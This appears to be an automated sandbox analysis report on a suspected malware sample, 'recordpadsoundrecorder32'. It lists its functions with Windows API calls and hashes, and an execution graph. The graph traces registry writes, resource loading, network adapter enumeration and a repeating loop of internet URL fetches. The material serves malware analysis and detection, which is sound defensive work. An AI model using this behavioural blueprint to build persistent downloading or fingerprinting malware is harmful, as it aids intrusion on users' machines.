                                                                                      • Opcode ID: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                      • Instruction ID: 6227662f3afde43d5576465443d89a1ce2d87db52467ebd9ddb435d6f9af9923
                                                                                      • Opcode Fuzzy Hash: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                      • Instruction Fuzzy Hash: 68316E31A00255AFDB105FB49F8896F7F68EF45344F10807AFE86F7291DA748845C7A8
                                                                                      Function 00403EEC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32 ref: 00403F0B
                                                                                      • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403F40
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403FA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                      • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                      • API String ID: 1385375860-4131005785
                                                                                      • Opcode ID: 902e60ade4d92a6391f73bc102fd9c1f1b848196a8b58942b8a92e566e39241b
                                                                                      • Instruction ID: f9b557e5926ae0cb1bea86ca91105dc92f8de38cdcecb6fe0ade7bda32980430
                                                                                      • Opcode Fuzzy Hash: 902e60ade4d92a6391f73bc102fd9c1f1b848196a8b58942b8a92e566e39241b
                                                                                      • Instruction Fuzzy Hash: B6312571D412886DEB319A705C45ADE7F7C8B06309F2400FBE685F62C2E6388FC98B19
                                                                                      Function 00403D14 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00403D6D
                                                                                      • GetFileType.KERNEL32(00000800), ref: 00403E13
                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00403E6C
                                                                                      • GetFileType.KERNEL32(00000000), ref: 00403E7A
                                                                                      • SetHandleCount.KERNEL32 ref: 00403EB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                                      • String ID:
                                                                                      • API String ID: 1710529072-0
                                                                                      • Opcode ID: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                      • Instruction ID: 9dbc4695f3205ced207c781c98d2c2eecf37425ec268f2c04ee58d1a3995b9ba
                                                                                      • Opcode Fuzzy Hash: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                      • Instruction Fuzzy Hash: 7C5143716046458BD7218F38CD887663FA8AF02B26F15473EE4A2FB2E0C7389A45C74D
                                                                                      Function 004069AB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069CE
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069E4
                                                                                      • LCMapStringW.KERNEL32(?,?,?,00000000,Wc@ ,?,?,00406357,00200020,00000000,?,00000000), ref: 00406A17
                                                                                      • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406A7F
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,Wc@ ,?,00000000,00000000,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406AA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 352835431-4128830131
                                                                                      • Opcode ID: 1312c45284bb9b0df6438f0e9267380287f1a9abf6012680dfeac5a7f92326d3
                                                                                      • Instruction ID: 95b79f799a9dc74ab8783d7474949c37cbdd673329ec6272a6b224a97d77f72f
                                                                                      • Opcode Fuzzy Hash: 1312c45284bb9b0df6438f0e9267380287f1a9abf6012680dfeac5a7f92326d3
                                                                                      • Instruction Fuzzy Hash: C2113A32A00209ABCF229F98CD04ADEBFB6FF49350F11816AF911722A0D3368D61DF54
                                                                                      Function 0040319A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00402EAA), ref: 0040319F
                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004031AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                      • API String ID: 1646373207-3105848591
                                                                                      • Opcode ID: 748c3a06171c204e9a1fd50ae91f73f3c4da2d806122e1fde3641ea021038800
                                                                                      • Instruction ID: 8ffc782c345fbc4a568335a89d7931e33654b4b0dba7f91db9b0a41dc5523864
                                                                                      • Opcode Fuzzy Hash: 748c3a06171c204e9a1fd50ae91f73f3c4da2d806122e1fde3641ea021038800
                                                                                      • Instruction Fuzzy Hash: 25C08C70381B01A6EE602FB22F09B172C0C1B48B43F1800BE7A89F81C0CE7CC208813D
                                                                                      Function 00404C5C Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040407A), ref: 00404C7D
                                                                                      • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040407A), ref: 00404CA1
                                                                                      • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040407A), ref: 00404CBB
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040407A), ref: 00404D7C
                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040407A), ref: 00404D93
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual$FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 714016831-0
                                                                                      • Opcode ID: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                      • Instruction ID: 2da35cf39901cd0166ef30884cd3fae4f1f30d489fd3d975fdb0eff0fbde1f7b
                                                                                      • Opcode Fuzzy Hash: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                      • Instruction Fuzzy Hash: 5531E2B15017019BE3208F28EE44B22B7A4EBC8754F11863EEA55B73E1E778AC44CB5C
                                                                                      Function 0040447E Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 265memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00008000,00004000,7591DFF0,?,00000000), ref: 004046D6
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00404731
                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 00404743
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Virtual$Heap
                                                                                      • String ID: t/@
                                                                                      • API String ID: 2016334554-3363397731
                                                                                      • Opcode ID: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                      • Instruction ID: 8d17195ec0ccff2424cf6b57804f20dfeb37273885bc82fd82189131503ce94b
                                                                                      • Opcode Fuzzy Hash: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                      • Instruction Fuzzy Hash: 3EB19EB4A01205DFDB14CF44CAD0A69BBA1FB88314F25C1AEDA596F3A2D735ED41CB84
                                                                                      Function 0040606F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(?,00000000), ref: 00406083
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: $
                                                                                      • API String ID: 1807457897-3032137957
                                                                                      • Opcode ID: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                                                      • Instruction ID: 3e87ef9e1105c78bb2f85cebc7c09ea1e0cb28c4563d123519c4b9c13c46ffd4
                                                                                      • Opcode Fuzzy Hash: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                                                      • Instruction Fuzzy Hash: 0C414831004258AAEB119B54CD99BFB3FE9DB06704F1501F6D587FB1D3C23949648BAE
                                                                                      Function 00404AB0 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404AD8
                                                                                      • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B0C
                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B26
                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,00404878,?,?,?,00000100,?,00000000), ref: 00404B3D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap$FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3499195154-0
                                                                                      • Opcode ID: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                      • Instruction ID: e332c3e7fbabb4a530177a7352d9393d0fbd82ec7ab2db7e11d44f19093e014a
                                                                                      • Opcode Fuzzy Hash: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                                                      • Instruction Fuzzy Hash: 611116B0201601DFC7219F19EE85E22BBB5FB84720711463AF292E65F0D771A845CF5C

                                                                                      Execution Graph

                                                                                      Execution Coverage:9.1%
                                                                                      Dynamic/Decrypted Code Coverage:84.5%
                                                                                      Signature Coverage:2.4%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:33
                                                                                      execution_graph 20953 40d460 RegSetValueExA RegCloseKey 20954 40da8b 20953->20954 20957 4022cb 20954->20957 20958 4022f2 WaitForSingleObject 20957->20958 20960 2694488 20961 26a079a 20960->20961 20965 260f955 LoadLibraryA 20961->20965 20962 26a079f 20964 260f955 64 API calls 20962->20964 20964->20962 20966 260fa38 20965->20966 20967 260f97e GetProcAddress 20965->20967 20966->20962 20968 260fa31 FreeLibrary 20967->20968 20971 260f992 20967->20971 20968->20966 20969 260f9a4 GetAdaptersInfo 20969->20971 20970 260fa2c 20970->20968 20971->20969 20971->20970 20972 2613afc _Allocate 60 API calls 20971->20972 20972->20971 18685 40d804 18686 40d817 18685->18686 18687 40d82c RegCreateKeyExA 18685->18687 18686->18687 18688 40dbc9 18686->18688 18689 40d1c4 18692 401f64 FindResourceA 18689->18692 18691 40d1c9 18693 401f86 GetLastError SizeofResource 18692->18693 18694 401f9f 18692->18694 18693->18694 18695 401fa6 LoadResource LockResource GlobalAlloc 18693->18695 18694->18691 18696 401fd2 18695->18696 18697 401ffb GetTickCount 18696->18697 18699 402005 GlobalAlloc 18697->18699 18699->18694 20973 4025a4 20974 40255f 20973->20974 20975 402926 20974->20975 20977 2613cbf 20974->20977 20978 2613cc8 20977->20978 20979 2613ccd 20977->20979 20991 261b891 20978->20991 20983 2613ce2 20979->20983 20982 2613cdb 20982->20975 20984 2613cee ___DllMainCRTStartup 20983->20984 20988 2613d3c ___DllMainCRTStartup 20984->20988 20990 2613d99 ___DllMainCRTStartup 20984->20990 20995 2613b4d 20984->20995 20986 2613d76 20987 2613b4d __CRT_INIT@12 138 API calls 20986->20987 20986->20990 20987->20990 20988->20986 20989 2613b4d __CRT_INIT@12 138 API calls 20988->20989 20988->20990 20989->20986 20990->20982 20992 261b8c1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 20991->20992 20993 261b8b4 20991->20993 20994 261b8b8 20992->20994 20993->20992 20993->20994 20994->20979 20996 2613b59 ___DllMainCRTStartup 20995->20996 20997 2613b61 20996->20997 20998 2613bdb 20996->20998 21043 2618196 GetProcessHeap 20997->21043 21000 2613c44 20998->21000 21001 2613bdf 20998->21001 21003 2613ca7 21000->21003 21004 2613c49 21000->21004 21006 2613c00 21001->21006 21037 2613b6a ___DllMainCRTStartup __CRT_INIT@12 21001->21037 21144 261840b 21001->21144 21002 2613b66 21002->21037 21044 2615d44 21002->21044 21011 2615bd4 __freeptd 59 API calls 21003->21011 21003->21037 21005 261917b __getptd_noexit TlsGetValue 21004->21005 21008 2613c54 21005->21008 21147 26182e2 RtlDecodePointer 21006->21147 21014 2618a1c __calloc_crt 59 API calls 21008->21014 21008->21037 21011->21037 21012 2613b76 __RTC_Initialize 21020 2613b86 GetCommandLineA 21012->21020 21012->21037 21016 2613c65 21014->21016 21015 2613c16 __CRT_INIT@12 21171 2613c2f 21015->21171 21021 261919a __getptd_noexit TlsSetValue 21016->21021 21016->21037 21017 261b52f __ioterm 60 API calls 21019 2613c11 21017->21019 21022 2615dba __mtterm 62 API calls 21019->21022 21065 261b92d GetEnvironmentStringsW 21020->21065 21024 2613c7d 21021->21024 21022->21015 21026 2613c83 21024->21026 21027 2613c9b 21024->21027 21029 2615c91 __initptd 59 API calls 21026->21029 21030 2612f24 _free 59 API calls 21027->21030 21032 2613c8b GetCurrentThreadId 21029->21032 21030->21037 21031 2613ba0 21033 2613ba4 21031->21033 21097 261b581 21031->21097 21032->21037 21130 2615dba 21033->21130 21037->20988 21038 2613bc4 21038->21037 21139 261b52f 21038->21139 21043->21002 21175 26184b2 RtlEncodePointer 21044->21175 21046 2615d49 21180 26189ce 21046->21180 21049 2615d52 21050 2615dba __mtterm 62 API calls 21049->21050 21052 2615d57 21050->21052 21052->21012 21054 2615d6f 21055 2618a1c __calloc_crt 59 API calls 21054->21055 21056 2615d7c 21055->21056 21057 2615db1 21056->21057 21058 261919a __getptd_noexit TlsSetValue 21056->21058 21059 2615dba __mtterm 62 API calls 21057->21059 21060 2615d90 21058->21060 21061 2615db6 21059->21061 21060->21057 21062 2615d96 21060->21062 21061->21012 21063 2615c91 __initptd 59 API calls 21062->21063 21064 2615d9e GetCurrentThreadId 21063->21064 21064->21012 21066 261b940 WideCharToMultiByte 21065->21066 21067 2613b96 21065->21067 21069 261b973 21066->21069 21070 261b9aa FreeEnvironmentStringsW 21066->21070 21078 261b27b 21067->21078 21071 2618a64 __malloc_crt 59 API calls 21069->21071 21070->21067 21072 261b979 21071->21072 21072->21070 21073 261b980 WideCharToMultiByte 21072->21073 21074 261b996 21073->21074 21075 261b99f FreeEnvironmentStringsW 21073->21075 21076 2612f24 _free 59 API calls 21074->21076 21075->21067 21077 261b99c 21076->21077 21077->21075 21079 261b287 ___DllMainCRTStartup 21078->21079 21080 261889d __lock 59 API calls 21079->21080 21081 261b28e 21080->21081 21082 2618a1c __calloc_crt 59 API calls 21081->21082 21083 261b29f 21082->21083 21084 261b30a GetStartupInfoW 21083->21084 21085 261b2aa ___DllMainCRTStartup @_EH4_CallFilterFunc@8 21083->21085 21087 261b44e 21084->21087 21091 261b31f 21084->21091 21085->21031 21086 261b516 21188 261b526 21086->21188 21087->21086 21090 261b49b GetStdHandle 21087->21090 21093 261b4ae GetFileType 21087->21093 21096 26191bc __ioinit InitializeCriticalSectionAndSpinCount 21087->21096 21089 2618a1c __calloc_crt 59 API calls 21089->21091 21090->21087 21091->21087 21091->21089 21092 261b36d 21091->21092 21092->21087 21094 261b3a1 GetFileType 21092->21094 21095 26191bc __ioinit InitializeCriticalSectionAndSpinCount 21092->21095 21093->21087 21094->21092 21095->21092 21096->21087 21098 261b594 GetModuleFileNameA 21097->21098 21099 261b58f 21097->21099 21100 261b5c1 21098->21100 21198 261523a 21099->21198 21192 261b634 21100->21192 21103 2613bb0 21103->21038 21108 261b7b0 21103->21108 21105 2618a64 __malloc_crt 59 API calls 21106 261b5fa 21105->21106 21106->21103 21107 261b634 _parse_cmdline 59 API calls 21106->21107 21107->21103 21109 261b7b9 21108->21109 21111 261b7be _strlen 21108->21111 21110 261523a ___initmbctable 71 API calls 21109->21110 21110->21111 21112 2618a1c __calloc_crt 59 API calls 21111->21112 21115 2613bb9 21111->21115 21120 261b7f4 _strlen 21112->21120 21113 261b846 21115->21038 21124 261841a 21115->21124 21116 2618a1c __calloc_crt 59 API calls 21116->21120 21117 261b86d 21120->21113 21120->21115 21120->21116 21120->21117 21121 261b884 21120->21121 21312 2616c6c 21120->21312 21126 2618426 __IsNonwritableInCurrentImage 21124->21126 21131 2615dc4 21130->21131 21133 2615dca 21130->21133 21324 261915c 21131->21324 21134 26188e7 RtlDeleteCriticalSection 21133->21134 21135 2618903 21133->21135 21136 2612f24 _free 59 API calls 21134->21136 21137 261890f RtlDeleteCriticalSection 21135->21137 21138 2618922 21135->21138 21136->21133 21137->21135 21138->21037 21143 261b536 21139->21143 21140 261b57e 21140->21033 21141 2612f24 _free 59 API calls 21141->21143 21142 261b54f RtlDeleteCriticalSection 21142->21143 21143->21140 21143->21141 21143->21142 21145 2618554 _doexit 59 API calls 21144->21145 21146 2618416 21145->21146 21146->21006 21148 261830e 21147->21148 21149 26182fc 21147->21149 21150 2612f24 _free 59 API calls 21148->21150 21149->21148 21151 2612f24 _free 59 API calls 21149->21151 21152 261831b 21150->21152 21151->21149 21153 261833f 21152->21153 21155 2612f24 _free 59 API calls 21152->21155 21154 2612f24 _free 59 API calls 21153->21154 21156 261834b 21154->21156 21155->21152 21157 2612f24 _free 59 API calls 21156->21157 21158 261835c 21157->21158 21159 2612f24 _free 59 API calls 21158->21159 21160 2618367 21159->21160 21161 261838c RtlEncodePointer 21160->21161 21164 2612f24 _free 59 API calls 21160->21164 21162 26183a1 21161->21162 21163 26183a7 21161->21163 21165 2612f24 _free 59 API calls 21162->21165 21166 26183bd 21163->21166 21169 2612f24 _free 59 API calls 21163->21169 21168 261838b 21164->21168 21165->21163 21167 2613c05 21166->21167 21170 2612f24 _free 59 API calls 21166->21170 21167->21015 21167->21017 21168->21161 21169->21166 21170->21167 21172 2613c41 21171->21172 21173 2613c33 21171->21173 21172->21037 21173->21172 21174 2615dba __mtterm 62 API calls 21173->21174 21174->21172 21176 26184c3 __init_pointers __initp_misc_winsig 21175->21176 21187 26139b7 RtlEncodePointer 21176->21187 21178 26184db __init_pointers 21179 261922a 34 API calls 21178->21179 21179->21046 21183 26189da 21180->21183 21181 26191bc __ioinit InitializeCriticalSectionAndSpinCount 21181->21183 21182 2615d4e 21182->21049 21184 261913e 21182->21184 21183->21181 21183->21182 21185 2619155 TlsAlloc 21184->21185 21186 2615d64 21184->21186 21186->21049 21186->21054 21187->21178 21191 2618a07 RtlLeaveCriticalSection 21188->21191 21190 261b52d 21190->21085 21191->21190 21194 261b656 21192->21194 21197 261b6ba 21194->21197 21202 2621586 21194->21202 21195 261b5d7 21195->21103 21195->21105 21196 2621586 _parse_cmdline 59 API calls 21196->21197 21197->21195 21197->21196 21199 2615243 21198->21199 21200 261524a 21198->21200 21208 2615597 21199->21208 21200->21098 21205 262152c 21202->21205 21206 261222b _LocaleUpdate::_LocaleUpdate 59 API calls 21205->21206 21207 262153e 21206->21207 21207->21194 21209 26155a3 ___DllMainCRTStartup 21208->21209 21210 2615c0a __beginthreadex 59 API calls 21209->21210 21211 26155ab 21210->21211 21212 26154f1 __setmbcp 59 API calls 21211->21212 21213 26155b5 21212->21213 21233 2615292 21213->21233 21234 261222b _LocaleUpdate::_LocaleUpdate 59 API calls 21233->21234 21235 26152a2 21234->21235 21325 2619173 TlsFree 21324->21325 21326 261916f 21324->21326 21325->21133 21326->21133 18700 4028c5 Sleep 18701 40d548 18700->18701 18704 26072a7 InternetOpenA 18705 26072c5 InternetSetOptionA InternetSetOptionA InternetSetOptionA 18704->18705 18739 26066f0 _memset shared_ptr 18704->18739 18712 260733e _memset 18705->18712 18706 260731e InternetOpenUrlA 18707 260737e InternetCloseHandle 18706->18707 18706->18712 18707->18739 18708 260670a RtlEnterCriticalSection RtlLeaveCriticalSection 18708->18739 18709 2606704 Sleep 18709->18708 18710 2607342 InternetReadFile 18711 2607373 InternetCloseHandle 18710->18711 18710->18712 18711->18707 18712->18706 18712->18710 18713 26073e5 RtlEnterCriticalSection RtlLeaveCriticalSection 18815 26122ec 18713->18815 18717 2607766 RtlEnterCriticalSection RtlLeaveCriticalSection 18717->18739 18719 26122ec 66 API calls 18719->18739 18722 26078de RtlEnterCriticalSection 18723 260790b RtlLeaveCriticalSection 18722->18723 18722->18739 18892 2603c67 18723->18892 18725 2612f5c 59 API calls _malloc 18725->18739 18726 2612f24 59 API calls _free 18726->18739 18731 2613596 60 API calls _strtok 18731->18739 18736 260a6d3 73 API calls 18736->18739 18739->18704 18739->18708 18739->18709 18739->18713 18739->18717 18739->18719 18739->18722 18739->18723 18739->18725 18739->18726 18739->18731 18739->18736 18739->18739 18743 26076e3 shared_ptr 18739->18743 18744 26076e8 Sleep 18739->18744 18747 2605119 18739->18747 18776 260abbd 18739->18776 18786 26061f1 18739->18786 18789 26082e9 18739->18789 18795 260d0c5 18739->18795 18800 2608398 18739->18800 18808 26033b2 18739->18808 18825 2612f5c 18739->18825 18842 2612800 18739->18842 18845 2613afc 18739->18845 18853 26096e5 18739->18853 18860 260a7fd 18739->18860 18868 2604100 18739->18868 18872 26123c8 18739->18872 18883 2601ba7 18739->18883 18899 2603d7e 18739->18899 18906 2608fb1 18739->18906 18913 260534d 18739->18913 18743->18744 18864 26118a0 18744->18864 18748 2605123 __EH_prolog 18747->18748 18923 2610ac0 18748->18923 18751 2603c67 72 API calls 18752 260514a 18751->18752 18753 2603d7e 64 API calls 18752->18753 18754 2605158 18753->18754 18755 26082e9 89 API calls 18754->18755 18756 260516c 18755->18756 18757 2605322 shared_ptr 18756->18757 18927 260a6d3 18756->18927 18757->18739 18760 26051c4 18762 260a6d3 73 API calls 18760->18762 18761 26051f6 18763 260a6d3 73 API calls 18761->18763 18765 26051d4 18762->18765 18764 2605207 18763->18764 18764->18757 18766 260a6d3 73 API calls 18764->18766 18765->18757 18768 260a6d3 73 API calls 18765->18768 18767 260524a 18766->18767 18767->18757 18770 260a6d3 73 API calls 18767->18770 18769 26052b4 18768->18769 18769->18757 18771 260a6d3 73 API calls 18769->18771 18770->18765 18772 26052da 18771->18772 18772->18757 18773 260a6d3 73 API calls 18772->18773 18774 2605304 18773->18774 18932 260ce87 18774->18932 18777 260abc7 __EH_prolog 18776->18777 19313 260d09c 18777->19313 18779 260abe8 shared_ptr 19316 26120a0 18779->19316 18781 260abff 18782 260ac15 18781->18782 19322 2603fb0 18781->19322 18782->18739 18787 2612f5c _malloc 59 API calls 18786->18787 18788 2606204 18787->18788 18790 2608301 18789->18790 18791 2608322 18789->18791 20066 26095ab 18790->20066 18794 2608347 18791->18794 20069 2602ac7 18791->20069 18794->18739 18796 2610ac0 Mailbox 68 API calls 18795->18796 18797 260d0db 18796->18797 18798 260d1c9 18797->18798 18799 2602db5 73 API calls 18797->18799 18798->18739 18799->18797 18801 26083b3 WSASetLastError shutdown 18800->18801 18802 26083a3 18800->18802 18803 260a4b7 69 API calls 18801->18803 18804 2610ac0 Mailbox 68 API calls 18802->18804 18805 26083d0 18803->18805 18806 26083a8 18804->18806 18805->18806 18807 2610ac0 Mailbox 68 API calls 18805->18807 18806->18739 18807->18806 18809 26033e1 18808->18809 18810 26033c4 InterlockedCompareExchange 18808->18810 18811 26029ee 76 API calls 18809->18811 18810->18809 18812 26033d6 18810->18812 18814 26033f1 18811->18814 20163 26032ab 18812->20163 18814->18739 18817 26122f8 18815->18817 18819 261231b 18815->18819 18818 26122fe 18817->18818 18817->18819 18821 2615e0b __fptostr 59 API calls 18818->18821 20216 2612333 18819->20216 18820 261232e 18820->18739 18822 2612303 18821->18822 18823 2614ea5 __fptostr 9 API calls 18822->18823 18824 261230e 18823->18824 18824->18739 18826 2612fd7 18825->18826 18833 2612f68 18825->18833 18827 26181b3 _malloc RtlDecodePointer 18826->18827 18828 2612fdd 18827->18828 18829 2615e0b __fptostr 58 API calls 18828->18829 18841 2607499 RtlEnterCriticalSection RtlLeaveCriticalSection 18829->18841 18830 2618683 __FF_MSGBANNER 58 API calls 18834 2612f73 18830->18834 18831 2612f9b RtlAllocateHeap 18831->18833 18831->18841 18832 26186e0 __NMSG_WRITE 58 API calls 18832->18834 18833->18831 18833->18834 18835 2612fc3 18833->18835 18837 26181b3 _malloc RtlDecodePointer 18833->18837 18839 2612fc1 18833->18839 18834->18830 18834->18832 18834->18833 18836 26182cc __mtinitlocknum 3 API calls 18834->18836 18838 2615e0b __fptostr 58 API calls 18835->18838 18836->18834 18837->18833 18838->18839 18840 2615e0b __fptostr 58 API calls 18839->18840 18840->18841 18841->18739 20273 261281e 18842->20273 18844 2612819 18844->18739 18847 2613b04 18845->18847 18846 2612f5c _malloc 59 API calls 18846->18847 18847->18846 18848 2613b1e 18847->18848 18849 26181b3 _malloc RtlDecodePointer 18847->18849 18850 2613b22 std::exception::exception 18847->18850 18848->18739 18849->18847 18851 261450a __CxxThrowException@8 RaiseException 18850->18851 18852 2613b4c 18851->18852 18854 26096ef __EH_prolog 18853->18854 18855 2601ba7 210 API calls 18854->18855 18856 2609744 18855->18856 18857 2609761 RtlEnterCriticalSection 18856->18857 18858 260977c 18857->18858 18859 260977f RtlLeaveCriticalSection 18857->18859 18858->18859 18859->18739 18861 260a807 __EH_prolog 18860->18861 20279 260dfae 18861->20279 18863 260a825 shared_ptr 18863->18739 18865 26118d1 18864->18865 18866 26118ad 18864->18866 18865->18739 18866->18865 18867 26118c1 GetProcessHeap HeapFree 18866->18867 18867->18865 18869 2604112 18868->18869 18870 2604118 18868->18870 20283 260a6b1 18869->20283 18870->18739 18873 26123e4 18872->18873 18874 26123f9 18872->18874 18875 2615e0b __fptostr 59 API calls 18873->18875 18874->18873 18876 2612400 18874->18876 18877 26123e9 18875->18877 20285 2616000 18876->20285 18880 2614ea5 __fptostr 9 API calls 18877->18880 18882 26123f4 18880->18882 18882->18739 20510 26253a0 18883->20510 18885 2601bb1 RtlEnterCriticalSection 18886 2601be9 RtlLeaveCriticalSection 18885->18886 18888 2601bd1 18885->18888 20511 260e2de 18886->20511 